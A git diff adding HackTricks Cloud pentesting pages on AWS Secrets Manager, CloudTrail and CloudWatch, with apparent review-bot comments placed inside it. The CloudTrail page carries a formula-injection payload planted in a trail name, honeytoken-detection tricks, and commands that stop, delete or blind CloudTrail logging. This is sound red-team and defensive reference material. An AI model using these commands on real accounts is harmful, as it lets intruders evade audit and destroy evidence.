+{% endhint %} diff --git a/pentesting-cloud/aws-security/aws-services/aws-secrets-manager-enum.md b/pentesting-cloud/aws-security/aws-services/aws-secrets-manager-enum.md new file mode 100644 index 0000000000..95d71ffd10 --- /dev/null +++ b/pentesting-cloud/aws-security/aws-services/aws-secrets-manager-enum.md @@ -0,0 +1,76 @@ +# AWS - Secrets Manager Enum + +{% hint style="success" %} +Learn & practice AWS Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\ +Learn & practice GCP Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte) + +
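Review bot: In aws-s3-athena-and-glacier-enum.md, the sample URL under `### S3 Presigned URLs` carries a complete `X-Amz-Credential` (access key `ASIAUUE8GZC4S5L3TY3P`), a full `X-Amz-Security-Token` and an `X-Amz-Signature`; even if the one-hour expiry has long passed, credential-shaped material should not be committed to a public repo, so replace the token and signature with obvious placeholders and keep only the query-parameter names the text needs. The accompanying hint is also misleading: generating a presigned URL needs no permission at all, the permission check happens when the URL is used, so "the only permission needed by the principal is `s3:GetObject`" should say that the URL only works if the signing principal has `s3:GetObject` when the request is made. In the `### Enumeration` block, `aws s3 rb s3://bucket-name –-force` uses an en dash instead of a double hyphen and will not parse (`--force`); `aws s3 ls s3://bucket-name --recursive` sits under the "(no creds)" comment but lacks `--no-sign-request`; and the two JSON documents are inside the bash fence, so the block cannot be pasted as-is (move them to their own `json` fences). In the Athena `### Enumeration` block the comment on `aws athena get-query-results --query-execution-id # This will rerun the query and get the results` is wrong: GetQueryResults reads the stored results from the query result location, it does not re-execute the query. In the Athena text, "SSE-C and CSE-E are not supported" should read "CSE-C" to match the mechanism names defined above, and the "rotation only every 3 years" claim for SSE-S3 has no source; cite one or drop it. Typos to fix while here: "access login" (logging), "S£" (S3), "paintext", "willbe", "accesible", "it's own custom CMK" (its), and "order to against their usage using AWS Cloud Trail" (audit their usage using AWS CloudTrail).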
+ +Support HackTricks + +* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)! +* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.** +* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. + +
+{% endhint %} + +## AWS Secrets Manager + +AWS Secrets Manager is designed to **eliminate the use of hard-coded secrets in applications by replacing them with an API call**. This service serves as a **centralized repository for all your secrets**, ensuring they are managed uniformly across all applications. + +The manager simplifies the **process of rotating secrets**, significantly improving the security posture of sensitive data like database credentials. Additionally, secrets like API keys can be automatically rotated with the integration of lambda functions. + +The access to secrets is tightly controlled through detailed IAM identity-based policies and resource-based policies. + +For granting access to secrets to a user from a different AWS account, it's necessary to: + +1. Authorize the user to access the secret. +2. Grant permission to the user to decrypt the secret using KMS. +3. Modify the Key policy to allow the external user to utilize it. + +**AWS Secrets Manager integrates with AWS KMS to encrypt your secrets within AWS Secrets Manager.** + +### **Enumeration** + +```bash +aws secretsmanager list-secrets #Get metadata of all secrets +aws secretsmanager list-secret-version-ids --secret-id # Get versions +aws secretsmanager describe-secret --secret-id # Get metadata +aws secretsmanager get-secret-value --secret-id # Get value +aws secretsmanager get-secret-value --secret-id --version-id # Get value of a different version +aws secretsmanager get-resource-policy --secret-id --secret-id +``` + +### Privesc + +{% content-ref url="../aws-privilege-escalation/aws-secrets-manager-privesc.md" %} +[aws-secrets-manager-privesc.md](../aws-privilege-escalation/aws-secrets-manager-privesc.md) +{% endcontent-ref %} + +### Post Exploitation + +{% content-ref url="../aws-post-exploitation/aws-secrets-manager-post-exploitation.md" %} +[aws-secrets-manager-post-exploitation.md](../aws-post-exploitation/aws-secrets-manager-post-exploitation.md) +{% endcontent-ref %} + +### 
Persistence + +{% content-ref url="../aws-persistence/aws-secrets-manager-persistence.md" %} +[aws-secrets-manager-persistence.md](../aws-persistence/aws-secrets-manager-persistence.md) +{% endcontent-ref %} + +{% hint style="success" %} +Learn & practice AWS Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\ +Learn & practice GCP Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte) + +
+ +Support HackTricks + +* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)! +* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.** +* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. + +
+{% endhint %} diff --git a/pentesting-cloud/aws-security/aws-services/aws-security-and-detection-services/README.md b/pentesting-cloud/aws-security/aws-services/aws-security-and-detection-services/README.md new file mode 100644 index 0000000000..0416f90ff9 --- /dev/null +++ b/pentesting-cloud/aws-security/aws-services/aws-security-and-detection-services/README.md @@ -0,0 +1,2 @@ +# AWS - Security & Detection Services + diff --git a/pentesting-cloud/aws-security/aws-services/aws-security-and-detection-services/aws-cloudtrail-enum.md b/pentesting-cloud/aws-security/aws-services/aws-security-and-detection-services/aws-cloudtrail-enum.md new file mode 100644 index 0000000000..4d18615341 --- /dev/null +++ b/pentesting-cloud/aws-security/aws-services/aws-security-and-detection-services/aws-cloudtrail-enum.md @@ -0,0 +1,330 @@ +# AWS - CloudTrail Enum + +{% hint style="success" %} +Learn & practice AWS Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\ +Learn & practice GCP Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte) + +
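Review bot: In aws-secrets-manager-enum.md, the last line of the `### Enumeration` block, `aws secretsmanager get-resource-policy --secret-id --secret-id`, repeats the `--secret-id` flag and will fail; it should take a single secret identifier. The cross-account list (steps 1-3) would benefit from one more sentence: the secret must be encrypted with a customer managed KMS key for step 3 to be possible, because the AWS managed key `aws/secretsmanager` cannot be shared with another account.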
+ +Support HackTricks + +* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)! +* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.** +* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. + +
+{% endhint %} + +## **CloudTrail** + +AWS CloudTrail **records and monitors activity within your AWS environment**. It captures detailed **event logs**, including who did what, when, and from where, for all interactions with AWS resources. This provides an audit trail of changes and actions, aiding in security analysis, compliance auditing, and resource change tracking. CloudTrail is essential for understanding user and resource behavior, enhancing security postures, and ensuring regulatory compliance. + +Each logged event contains: + +* The name of the called API: `eventName` +* The called service: `eventSource` +* The time: `eventTime` +* The IP address: `SourceIPAddress` +* The agent method: `userAgent`. Examples: + * Signing.amazonaws.com - From AWS Management Console + * console.amazonaws.com - Root user of the account + * lambda.amazonaws.com - AWS Lambda +* The request parameters: `requestParameters` +* The response elements: `responseElements` + +Event's are written to a new log file **approximately each 5 minutes in a JSON file**, they are held by CloudTrail and finally, log files are **delivered to S3 approximately 15mins after**.\ +CloudTrails logs can be **aggregated across accounts and across regions.**\ +CloudTrail allows to use **log file integrity in order to be able to verify that your log files have remained unchanged** since CloudTrail delivered them to you. It creates a SHA-256 hash of the logs inside a digest file. A sha-256 hash of the new logs is created every hour.\ +When creating a Trail the event selectors will allow you to indicate the trail to log: Management, data or insights events. + +Logs are saved in an S3 bucket. By default Server Side Encryption is used (SSE-S3) so AWS will decrypt the content for the people that has access to it, but for additional security you can use SSE with KMS and your own keys. 
+ +The logs are stored in a **S3 bucket with this name format**: + +* **`BucketName/AWSLogs/AccountID/CloudTrail/RegionName/YYY/MM/DD`** +* Being the BucketName: **`aws-cloudtrail-logs--`** +* Example: **`aws-cloudtrail-logs-947247140022-ffb95fe7/AWSLogs/947247140022/CloudTrail/ap-south-1/2023/02/22/`** + +Inside each folder each log will have a **name following this format**: **`AccountID_CloudTrail_RegionName_YYYYMMDDTHHMMZ_Random.json.gz`** + +Log File Naming Convention + +![](<../../../../.gitbook/assets/image (122).png>) + +Moreover, **digest files (to check file integrity)** will be inside the **same bucket** in: + +![](<../../../../.gitbook/assets/image (195).png>) + +### Aggregate Logs from Multiple Accounts + +* Create a Trial in the AWS account where you want the log files to be delivered to +* Apply permissions to the destination S3 bucket allowing cross-account access for CloudTrail and allow each AWS account that needs access +* Create a new Trail in the other AWS accounts and select to use the created bucket in step 1 + +However, even if you can save al the logs in the same S3 bucket, you cannot aggregate CloudTrail logs from multiple accounts into a CloudWatch Logs belonging to a single AWS account. + +{% hint style="danger" %} +Remember that an account can have **different Trails** from CloudTrail **enabled** storing the same (or different) logs in different buckets. +{% endhint %} + +### Cloudtrail from all org accounts into 1 + +When creating a CloudTrail, it's possible to indicate to get activate cloudtrail for all the accounts in the org and get the logs into just 1 bucket: + +
+ +This way you can easily configure CloudTrail in all the regions of all the accounts and centralize the logs in 1 account (that you should protect). + +### Log Files Checking + +You can check that the logs haven't been altered by running + +{% code overflow="wrap" %} +```javascript +aws cloudtrail validate-logs --trail-arn --start-time [--end-time ] [--s3-bucket ] [--s3-prefix ] [--verbose] +``` +{% endcode %} + +### Logs to CloudWatch + +**CloudTrail can automatically send logs to CloudWatch so you can set alerts that warns you when suspicious activities are performed.**\ +Note that in order to allow CloudTrail to send the logs to CloudWatch a **role** needs to be created that allows that action. If possible, it's recommended to use AWS default role to perform these actions. This role will allow CloudTrail to: + +* CreateLogStream: This allows to create a CloudWatch Logs log streams +* PutLogEvents: Deliver CloudTrail logs to CloudWatch Logs log stream + +### Event History + +CloudTrail Event History allows you to inspect in a table the logs that have been recorded: + +![](<../../../../.gitbook/assets/image (89).png>) + +### Insights + +**CloudTrail Insights** automatically **analyzes** write management events from CloudTrail trails and **alerts** you to **unusual activity**. For example, if there is an increase in `TerminateInstance` events that differs from established baselines, you’ll see it as an Insight event. These events make **finding and responding to unusual API activity easier** than ever. + +The insights are stored in the same bucket as the CloudTrail logs in: `BucketName/AWSLogs/AccountID/CloudTrail-Insight` + +### Security + +| CloudTrail Log File Integrity |
  • Validate if logs have been tampered with (modified or deleted)
  • Uses digest files (create hash for each file)

    • SHA-256 hashing
    • SHA-256 with RSA for digital signing
    • private key owned by Amazon
  • Takes 1 hour to create a digest file (done on the hour every hour)
| +| ------------------------------------ | ------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------ | +| Stop unauthorized access |
  • Use IAM policies and S3 bucket policies

    • security team —> admin access
    • auditors —> read only access
  • Use SSE-S3/SSE-KMS to encrypt the logs
| +| Prevent log files from being deleted |
  • Restrict delete access with IAM and bucket policies
  • Configure S3 MFA delete
  • Validate with Log File Validation
| + +## Access Advisor + +AWS Access Advisor relies on last 400 days AWS **CloudTrail logs to gather its insights**. CloudTrail captures a history of AWS API calls and related events made in an AWS account. Access Advisor utilizes this data to **show when services were last accessed**. By analyzing CloudTrail logs, Access Advisor can determine which AWS services an IAM user or role has accessed and when that access occurred. This helps AWS administrators make informed decisions about **refining permissions**, as they can identify services that haven't been accessed for extended periods and potentially reduce overly broad permissions based on real usage patterns. + +{% hint style="success" %} +Therefore, Access Advisor informs about **the unnecessary permissions being given to users** so the admin could remove them +{% endhint %} + +
+ +## Actions + +### Enumeration + +```bash +# Get trails info +aws cloudtrail list-trails +aws cloudtrail describe-trails +aws cloudtrail list-public-keys +aws cloudtrail get-event-selectors --trail-name +aws [--region us-east-1] cloudtrail get-trail-status --name [default] + +# Get insights +aws cloudtrail get-insight-selectors --trail-name + +# Get data store info +aws cloudtrail list-event-data-stores +aws cloudtrail list-queries --event-data-store +aws cloudtrail get-query-results --event-data-store --query-id +``` + +### **CSV Injection** + +It's possible to perform a CVS injection inside CloudTrail that will execute arbitrary code if the logs are exported in CSV and open with Excel.\ +The following code will generate log entry with a bad Trail name containing the payload: + +```python +import boto3 +payload = "=cmd|'/C calc'|''" +client = boto3.client('cloudtrail') +response = client.create_trail( + Name=payload, + S3BucketName="random" +) +print(response) +``` + +For more information about CSV Injections check the page: + +{% embed url="https://book.hacktricks.xyz/pentesting-web/formula-injection" %} + +For more information about this specific technique check [https://rhinosecuritylabs.com/aws/cloud-security-csv-injection-aws-cloudtrail/](https://rhinosecuritylabs.com/aws/cloud-security-csv-injection-aws-cloudtrail/) + +## **Bypass Detection** + +### HoneyTokens **bypass** + +Honeyokens are created to **detect exfiltration of sensitive information**. In case of AWS, they are **AWS keys whose use is monitored**, if something triggers an action with that key, then someone must have stolen that key. + +However, Honeytokens like the ones created by [**Canarytokens**](https://canarytokens.org/generate)**,** [**SpaceCrab**](https://bitbucket.org/asecurityteam/spacecrab/issues?status=new\&status=open)**,** [**SpaceSiren**](https://github.com/spacesiren/spacesiren) are either using recognizable account name or using the same AWS account ID for all their customers. 
Therefore, if you can get the account name and/or account ID without making Cloudtrail create any log, **you could know if the key is a honeytoken or not**. + +[**Pacu**](https://github.com/RhinoSecurityLabs/pacu/blob/79cd7d58f7bff5693c6ae73b30a8455df6136cca/pacu/modules/iam__detect_honeytokens/main.py#L57) has some rules to detect if a key belongs to [**Canarytokens**](https://canarytokens.org/generate)**,** [**SpaceCrab**](https://bitbucket.org/asecurityteam/spacecrab/issues?status=new\&status=open)**,** [**SpaceSiren**](https://github.com/spacesiren/spacesiren)**:** + +* If **`canarytokens.org`** appears in the role name or the account ID **`534261010715`** appears in the error message. + * Testing them more recently, they are using the account **`717712589309`** and still has the **`canarytokens.com`** string in the name. +* If **`SpaceCrab`** appears in the role name in the error message +* **SpaceSiren** uses **uuids** to generate usernames: `[a-f0-9]{8}-[a-f0-9]{4}-4[a-f0-9]{3}-[89aAbB][a-f0-9]{3}-[a-f0-9]{12}` +* If the **name looks like randomly generated**, there are high probabilities that it's a HoneyToken. 
+ +#### Get the account ID from the Key ID + +You can get the **Account ID** from the **encoded** inside the **access key** as [**explained here**](https://medium.com/@TalBeerySec/a-short-note-on-aws-key-id-f88cc4317489) and check the account ID with your list of Honeytokens AWS accounts: + +```python +import base64 +import binascii + +def AWSAccount_from_AWSKeyID(AWSKeyID): + + trimmed_AWSKeyID = AWSKeyID[4:] #remove KeyID prefix + x = base64.b32decode(trimmed_AWSKeyID) #base32 decode + y = x[0:6] + + z = int.from_bytes(y, byteorder='big', signed=False) + mask = int.from_bytes(binascii.unhexlify(b'7fffffffff80'), byteorder='big', signed=False) + + e = (z & mask)>>7 + return (e) + +print("account id:" + "{:012d}".format(AWSAccount_from_AWSKeyID("ASIAQNZGKIQY56JQ7WML"))) +``` + +Check more information in the [**orginal research**](https://medium.com/@TalBeerySec/a-short-note-on-aws-key-id-f88cc4317489). + +#### Do not generate a log + +The most effective technique for this is actually a simple one. Just use the key you just found to access some service inside your own attackers account. This will make **CloudTrail generate a log inside YOUR OWN AWS account and not inside the victims**. + +The things is that the output will show you an error indicating the account ID and the account name so **you will be able to see if it's a Honeytoken**. + +#### AWS services without logs + +In the past there were some **AWS services that doesn't send logs to CloudTrail** (find a [list here](https://docs.aws.amazon.com/awscloudtrail/latest/userguide/cloudtrail-unsupported-aws-services.html)). Some of those services will **respond** with an **error** containing the **ARN of the key role** if someone unauthorised (the honeytoken key) try to access it. + +This way, an **attacker can obtain the ARN of the key without triggering any log**. 
In the ARN the attacker can see the **AWS account ID and the name**, it's easy to know the HoneyToken's companies accounts ID and names, so this way an attacker can identify id the token is a HoneyToken. + +![](<../../../../.gitbook/assets/image (93).png>) + +{% hint style="danger" %} +Note that all public APIs discovered to not being creating CloudTrail logs are now fixed, so maybe you need to find your own... + +For more information check the [**original research**](https://rhinosecuritylabs.com/aws/aws-iam-enumeration-2-0-bypassing-cloudtrail-logging/). +{% endhint %} + +### Accessing Third Infrastructure + +Certain AWS services will **spawn some infrastructure** such as **Databases** or **Kubernetes** clusters (EKS). A user **talking directly to those services** (like the Kubernetes API) **won’t use the AWS API**, so CloudTrail won’t be able to see this communication. + +Therefore, a user with access to EKS that has discovered the URL of the EKS API could generate a token locally and **talk to the API service directly without getting detected by Cloudtrail**. 
+ +More info in: + +{% content-ref url="../../aws-post-exploitation/aws-eks-post-exploitation.md" %} +[aws-eks-post-exploitation.md](../../aws-post-exploitation/aws-eks-post-exploitation.md) +{% endcontent-ref %} + +### Modifying CloudTrail Config + +#### Delete trails + +```bash +aws cloudtrail delete-trail --name [trail-name] +``` + +#### Stop trails + +```bash +aws cloudtrail stop-logging --name [trail-name] +``` + +#### Disable multi-region logging + +{% code overflow="wrap" %} +```bash +aws cloudtrail update-trail --name [trail-name] --no-is-multi-region --no-include-global-services +``` +{% endcode %} + +#### Disable Logging by Event Selectors + +{% code overflow="wrap" %} +```bash +# Leave only the ReadOnly selector +aws cloudtrail put-event-selectors --trail-name --event-selectors '[{"ReadWriteType": "ReadOnly"}]' --region + +# Remove all selectors (stop Insights) +aws cloudtrail put-event-selectors --trail-name --event-selectors '[]' --region +``` +{% endcode %} + +In the first example, a single event selector is provided as a JSON array with a single object. The `"ReadWriteType": "ReadOnly"` indicates that the **event selector should only capture read-only events** (so CloudTrail insights **won't be checking write** events for example). + +You can customize the event selector based on your specific requirements. 
+ +#### Logs deletion via S3 lifecycle policy + +{% code overflow="wrap" %} +```bash +aws s3api put-bucket-lifecycle --bucket --lifecycle-configuration '{"Rules": [{"Status": "Enabled", "Prefix": "", "Expiration": {"Days": 7}}]}' --region +``` +{% endcode %} + +### Modifying Bucket Configuration + +* Delete the S3 bucket +* Change bucket policy to deny any writes from the CloudTrail service +* Add lifecycle policy to S3 bucket to delete objects +* Disable the kms key used to encrypt the CloudTrail logs + +### Cloudtrail ransomware + +#### S3 ransomware + +You could **generate an asymmetric key** and make **CloudTrail encrypt the data** with that key and **delete the private key** so the CloudTrail contents cannot be recovered cannot be recovered.\ +This is basically a **S3-KMS ransomware** explained in: + +{% content-ref url="../../aws-post-exploitation/aws-s3-post-exploitation.md" %} +[aws-s3-post-exploitation.md](../../aws-post-exploitation/aws-s3-post-exploitation.md) +{% endcontent-ref %} + +**KMS ransomware** + +This is an easiest way to perform the previous attack with different permissions requirements: + +{% content-ref url="../../aws-post-exploitation/aws-kms-post-exploitation.md" %} +[aws-kms-post-exploitation.md](../../aws-post-exploitation/aws-kms-post-exploitation.md) +{% endcontent-ref %} + +## **References** + +* [https://cloudsecdocs.com/aws/services/logging/cloudtrail/#inventory](https://cloudsecdocs.com/aws/services/logging/cloudtrail/#inventory) + +{% hint style="success" %} +Learn & practice AWS Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\ +Learn & practice GCP Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte) + +
+ +Support HackTricks + +* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)! +* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.** +* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. + +
+{% endhint %} diff --git a/pentesting-cloud/aws-security/aws-services/aws-security-and-detection-services/aws-cloudwatch-enum.md b/pentesting-cloud/aws-security/aws-services/aws-security-and-detection-services/aws-cloudwatch-enum.md new file mode 100644 index 0000000000..69b0af8071 --- /dev/null +++ b/pentesting-cloud/aws-security/aws-services/aws-security-and-detection-services/aws-cloudwatch-enum.md @@ -0,0 +1,479 @@ +# AWS - CloudWatch Enum + +{% hint style="success" %} +Learn & practice AWS Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\ +Learn & practice GCP Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte) + +
+ +Support HackTricks + +* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)! +* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.** +* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. + +
+{% endhint %} + +## CloudWatch + +**CloudWatch** **collects** monitoring and operational **data** in the form of logs/metrics/events providing a **unified view of AWS resources**, applications and services.\ +CloudWatch Log Event have a **size limitation of 256KB on each log line**.\ +It can set **high resolution alarms**, visualize **logs** and **metrics** side by side, take automated actions, troubleshoot issues, and discover insights to optimize applications. + +You can monitor for example logs from CloudTrail. Events that are monitored: + +* Changes to Security Groups and NACLs +* Starting, Stopping, rebooting and terminating EC2 instances +* Changes to Security Policies within IAM and S3 +* Failed login attempts to the AWS Management Console +* API calls that resulted in failed authorization +* Filters to search in cloudwatch: [https://docs.aws.amazon.com/AmazonCloudWatch/latest/logs/FilterAndPatternSyntax.html](https://docs.aws.amazon.com/AmazonCloudWatch/latest/logs/FilterAndPatternSyntax.html) + +## Key concepts + +### Namespaces + +A namespace is a container for CloudWatch metrics. It helps to categorize and isolate metrics, making it easier to manage and analyze them. + +* **Examples**: AWS/EC2 for EC2-related metrics, AWS/RDS for RDS metrics. + +### Metrics + +Metrics are data points collected over time that represent the performance or utilization of AWS resources. Metrics can be collected from AWS services, custom applications, or third-party integrations. + +* **Example**: CPUUtilization, NetworkIn, DiskReadOps. + +### Dimensions + +Dimensions are key-value pairs that are part of metrics. They help to uniquely identify a metric and provide additional context, being 30 the most number of dimensions that can be associated with a metric. Dimensions also allow to filter and aggregate metrics based on specific attributes. + +* **Example**: For EC2 instances, dimensions might include InstanceId, InstanceType, and AvailabilityZone. 
+ +### Statistics + +Statistics are mathematical calculations performed on metric data to summarize it over time. Common statistics include Average, Sum, Minimum, Maximum, and SampleCount. + +* **Example**: Calculating the average CPU utilization over a period of one hour. + +### Units + +Units are the measurement type associated with a metric. Units help to provide context and meaning to the metric data. Common units include Percent, Bytes, Seconds, Count. + +* **Example**: CPUUtilization might be measured in Percent, while NetworkIn might be measured in Bytes. + +## CloudWatch Features + +### Dashboard + +**CloudWatch Dashboards** provide customizable **views of your AWS CloudWatch metrics**. It is possible to create and configure dashboards to visualize data and monitor resources in a single view, combining different metrics from various AWS services. + +**Key Features**: + +* **Widgets**: Building blocks of dashboards, including graphs, text, alarms, and more. +* **Customization**: Layout and content can be customized to fit specific monitoring needs. + +**Example Use Case**: + +* A single dashboard showing key metrics for your entire AWS environment, including EC2 instances, RDS databases, and S3 buckets. + +### Metric Stream and Metric Data + +**Metric Streams** in AWS CloudWatch enable you to continuously stream CloudWatch metrics to a destination of your choice in near real-time. This is particularly useful for advanced monitoring, analytics, and custom dashboards using tools outside of AWS. + +**Metric Data** inside Metric Streams refers to the actual measurements or data points that are being streamed. These data points represent various metrics like CPU utilization, memory usage, etc., for AWS resources. + +**Example Use Case**: + +* Sending real-time metrics to a third-party monitoring service for advanced analysis. +* Archiving metrics in an Amazon S3 bucket for long-term storage and compliance. 
+ +### Alarm + +**CloudWatch Alarms** monitor your metrics and perform actions based on predefined thresholds. When a metric breaches a threshold, the alarm can perform one or more actions such as sending notifications via SNS, triggering an auto-scaling policy, or running an AWS Lambda function. + +**Key Components**: + +* **Threshold**: The value at which the alarm triggers. +* **Evaluation Periods**: The number of periods over which data is evaluated. +* **Datapoints to Alarm**: The number of periods with a reached threshold needed to trigger the alarm +* **Actions**: What happens when an alarm state is triggered (e.g., notify via SNS). + +**Example Use Case**: + +* Monitoring EC2 instance CPU utilization and sending a notification via SNS if it exceeds 80% for 5 consecutive minutes. + +### Anomaly Detectors + +**Anomaly Detectors** use machine learning to automatically detect anomalies in your metrics. You can apply anomaly detection to any CloudWatch metric to identify deviations from normal patterns that might indicate issues. + +**Key Components**: + +* **Model Training**: CloudWatch uses historical data to train a model and establish what normal behavior looks like. +* **Anomaly Detection Band**: A visual representation of the expected range of values for a metric. + +**Example Use Case**: + +* Detecting unusual CPU utilization patterns in an EC2 instance that might indicate a security breach or application issue. + +### Insight Rules and Managed Insight Rules + +**Insight Rules** allow you to identify trends, detect spikes, or other patterns of interest in your metric data using **powerful mathematical expressions** to define the conditions under which actions should be taken. These rules can help you identify anomalies or unusual behaviors in your resource performance and utilization. + +**Managed Insight Rules** are pre-configured **insight rules provided by AWS**. 
They are designed to monitor specific AWS services or common use cases and can be enabled without needing detailed configuration. + +**Example Use Case**: + +* Monitoring RDS Performance: Enable a managed insight rule for Amazon RDS that monitors key performance indicators such as CPU utilization, memory usage, and disk I/O. If any of these metrics exceed safe operational thresholds, the rule can trigger an alert or automated mitigation action. + +### CloudWatch Logs + +Allows to **aggregate and monitor logs from applications** and systems from **AWS services** (including CloudTrail) and **from apps/systems** (**CloudWatch Agen**t can be installed on a host). Logs can be **stored indefinitely** (depending on the Log Group settings) and can be exported. + +**Elements**: + +| **Log Group** | A **collection of log streams** that share the same retention, monitoring, and access control settings | +| ------------------------ | ---------------------------------------------------------------------------------------------------------------------------------------------------------- | +| **Log Stream** | A sequence of **log events** that share the **same source** | +| **Subscription Filters** | Define a **filter pattern that matches events** in a particular log group, send them to Kinesis Data Firehose stream, Kinesis stream, or a Lambda function | + +### CloudWatch Monitoring & Events + +CloudWatch **basic** aggregates data **every 5min** (the **detailed** one does that **every 1 min**). After the aggregation, it **checks the thresholds of the alarms** in case it needs to trigger one.\ +In that case, CLoudWatch can be prepared to send an event and perform some automatic actions (AWS lambda functions, SNS topics, SQS queues, Kinesis Streams) + +### Agent Installation + +You can install agents inside your machines/containers to automatically send the logs back to CloudWatch. 
+ +* **Create** a **role** and **attach** it to the **instance** with permissions allowing CloudWatch to collect data from the instances in addition to interacting with AWS systems manager SSM (CloudWatchAgentAdminPolicy & AmazonEC2RoleforSSM) +* **Download** and **install** the **agent** onto the EC2 instance ([https://s3.amazonaws.com/amazoncloudwatch-agent/linux/amd64/latest/AmazonCloudWatchAgent.zip](https://s3.amazonaws.com/amazoncloudwatch-agent/linux/amd64/latest/AmazonCloudWatchAgent.zip)). You can download it from inside the EC2 or install it automatically using AWS System Manager selecting the package AWS-ConfigureAWSPackage +* **Configure** and **start** the CloudWatch Agent + +A log group has many streams. A stream has many events. And inside of each stream, the events are guaranteed to be in order. + +## Enumeration + +```bash +# Dashboards # + +## Returns a list of the dashboards of your account +aws cloudwatch list-dashboards + +## Retrieves the details of the specified dashboard +aws cloudwatch get-dashboard --dashboard-name + +# Metrics # + +## Returns a list of the specified metric +aws cloudwatch list-metrics [--namespace ] [--metric-name ] [--dimensions ] [--include-linked-accounts | --no-include-linked-accounts] + +## Retrieves metric data (this operation can include a CloudWatch Metrics Insights query, and one or more metric math functions) +aws cloudwatch get-metric-data --metric-data-queries --start-time --end-time + +## Retrieves statistics for the specified metric and namespace over a range of time +aws cloudwatch get-metric-statistics --namespace --metric-name [--dimensions ] --start-time --end-time --period + +## Returns a list of the metric streams of your account +aws cloudwatch list-metric-streams + +## Retrieves information about the specified metric stream +aws cloudwatch get-metric-stream --name + +## Retrieve snapshots of the specified metric widgets +aws cloudwatch get-metric-widget-image --metric-widget + +# Alarms # + +## 
Retrieves the specified alarm +aws cloudwatch describe-alarms [--alarm-names ] [--alarm-name-prefix ] [--alarm-types ] [--state-value ] + +## Retrieves the alarms history, even for deleted alarms +aws cloudwatch describe-alarm-history [--alarm-name ] [--alarm-types ] [--history-item-type ] [--start-date ] [--end-date ] + +## Retrieves standard alarms based on the specified metric +aws cloudwatch escribe-alarms-for-metric --metric-name --namespace [--dimensions ] + +# Anomaly Detections # + +## Lists the anomaly detection models that you have created in your account +aws cloudwatch describe-anomaly-detectors [--namespace ] [--metric-name ] [--dimensions ] + +## Lists all the Contributor Insight rules in your account +aws cloudwatch describe-insight-rules + +## Retrieves the data collected over a time range for a given Contributor Insight rule +aws cloudwatch get-insight-rule-report --rule-name --start-time --end-time --period + +## Lists managed Contributor Insights rules in your account for a specified resource +aws cloudwatch list-managed-insight-rules --resource-arn + +# Tags # + +## Lists the tags associated with the specified CloudWatch resources +aws cloudwatch list-tags-for-resource --resource-arn + +# CloudWatch Logs # +aws logs tail "" --followaws logs get-log-events --log-group-name "" --log-stream-name "" --output text > + +# CloudWatch Events # +aws events list-rules +aws events describe-rule --name aws events list-targets-by-rule --rule aws events list-archives +aws events describe-archive --archive-name aws events list-connections +aws events describe-connection --name aws events list-endpoints +aws events describe-endpoint --name aws events list-event-sources +aws events describe-event-source --name aws events list-replays +aws events list-api-destinations +aws events list-event-buses +``` + +## Post-Exploitation / Bypass + +### **`cloudwatch:DeleteAlarms`,`cloudwatch:PutMetricAlarm` , `cloudwatch:PutCompositeAlarm`** + +An attacker with this 
